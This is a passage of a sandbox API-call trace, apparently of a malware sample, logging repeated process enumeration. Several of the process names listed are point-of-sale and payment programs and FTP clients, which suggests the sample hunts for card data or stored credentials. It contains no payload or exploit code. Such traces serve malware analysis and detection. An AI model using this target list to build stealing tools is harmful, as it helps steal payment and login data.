| out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0239.675] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0239.677] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0239.678] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0239.680] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0239.682] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0239.684] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0239.686] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x594, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0239.687] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0239.689] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0239.691] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0239.692] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x100c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0239.694] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1018, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0239.695] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1028, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0239.697] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1034, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="likely-final-out.exe")) returned 1 [0239.699] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="local reality bank.exe")) returned 1 [0239.749] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="kitchen-box-instead.exe")) returned 1 [0239.750] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1058, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x9dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0239.752] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0239.753] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x127c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0239.755] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0239.756] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xd24, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0239.758] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0239.760] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0239.761] CloseHandle (hObject=0x1494) returned 1 [0239.761] Sleep (dwMilliseconds=0x64) [0239.882] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1494 [0239.895] Process32First (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0239.896] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x79, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0239.898] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0239.899] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0239.901] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0239.903] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0239.905] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0239.906] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0239.908] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0239.909] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0239.910] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0239.912] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0239.913] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0239.915] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0239.916] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0239.918] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0239.927] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0239.929] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0239.930] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0239.931] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0239.933] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0239.935] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0239.937] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0239.939] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0239.940] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0239.942] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0239.943] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0239.944] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0239.946] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0239.947] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x838, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0239.949] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0239.950] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0239.952] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="studentbecausedemocratic.exe")) returned 1 [0239.953] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="share.exe")) returned 1 [0239.955] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="myself.exe")) returned 1 [0239.956] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="feel.exe")) returned 1 [0239.958] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="action program citizen.exe")) returned 1 [0239.959] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="reachinvolve.exe")) returned 1 [0239.961] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="question.exe")) returned 1 [0239.962] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="play hit.exe")) returned 1 [0239.963] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mean.exe")) returned 1 [0240.012] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xde0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="evening.exe")) returned 1 [0240.018] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="memory everybody nature.exe")) returned 1 [0240.020] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="structurecausebar.exe")) returned 1 [0240.022] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="good.exe")) returned 1 [0240.024] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="item study safe.exe")) returned 1 [0240.026] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="health-prove-opportunity.exe")) returned 1 [0240.032] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="break.exe")) returned 1 [0240.035] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="minute-budget-themselves.exe")) returned 1 [0240.037] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0240.039] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0240.041] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0240.043] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0240.050] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0240.052] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0240.056] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0240.139] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xea0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0240.141] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0240.145] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0240.148] Process32Next (in: 